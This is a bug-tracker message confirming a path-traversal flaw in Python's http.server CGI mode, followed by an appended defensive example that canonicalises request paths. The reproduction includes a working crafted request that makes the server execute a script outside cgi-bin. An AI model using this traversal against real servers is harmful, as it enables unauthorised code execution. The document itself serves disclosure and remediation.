Message201647
I can confirm the issue:
$ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi
$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: Tue, 29 Oct 2013 16:47:22 GMT
hacked

Date | User | Action | Args
2013-10-29 16:48:40 | christian.heimes | set | recipients: + christian.heimes, georg.brandl, vstinner, larry, benjamin.peterson, Alexander.Kruppa
2013-10-29 16:48:40 | christian.heimes | set | messageid: <1383065320.2.0.995297367448.issue19435@psf.upfronthosting.co.za>
2013-10-29 16:48:40 | christian.heimes | link | issue19435 messages
2013-10-29 16:48:39 | christian.heimes | create |
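
An added example, not part of the original message and not CPython's code: one way a server can classify the request shown above, by collapsing the path once and deriving both the CGI directory and the script name from that single canonical form. The names `collapse_path`, `resolve_cgi` and `CGI_DIRECTORIES` are hypothetical; the directory list is an assumed allow-list.

```python
from urllib.parse import unquote

# Assumed allow-list of URL prefixes whose files may be executed as CGI.
CGI_DIRECTORIES = ("/cgi-bin", "/htbin")


def collapse_path(raw_path):
    """Return a canonical absolute URL path: query stripped, percent-decoded,
    empty and '.' segments dropped, '..' resolved without climbing above '/'."""
    path = unquote(raw_path.split("?", 1)[0])
    stack = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue  # repeated slashes and '.' carry no meaning
        if segment == "..":
            if stack:
                stack.pop()  # never pop past the document root
            continue
        stack.append(segment)
    return "/" + "/".join(stack)


def resolve_cgi(raw_path, cgi_dirs=CGI_DIRECTORIES):
    """Return (directory, script) when the canonical path names a file inside
    a CGI directory, else None. Both values come from the collapsed path only,
    so the raw request text never selects the file that gets executed."""
    collapsed = collapse_path(raw_path)
    for directory in cgi_dirs:
        prefix = directory + "/"
        if collapsed.startswith(prefix) and len(collapsed) > len(prefix):
            return directory, collapsed[len(prefix):]
    return None


if __name__ == "__main__":
    # Request path from the message above, plus constructed variants.
    for sample in ("///////////badscript.sh/../cgi-bin/cgi.sh",
                   "/cgi-bin/../badscript.sh",
                   "/cgi-bin/%2e%2e/badscript.sh",
                   "/badscript.sh"):
        print(sample, "->", collapse_path(sample), resolve_cgi(sample))
```

With this check the request from the message can only ever map to `cgi.sh` inside `/cgi-bin`; a file outside the allow-listed directories is never returned as a script.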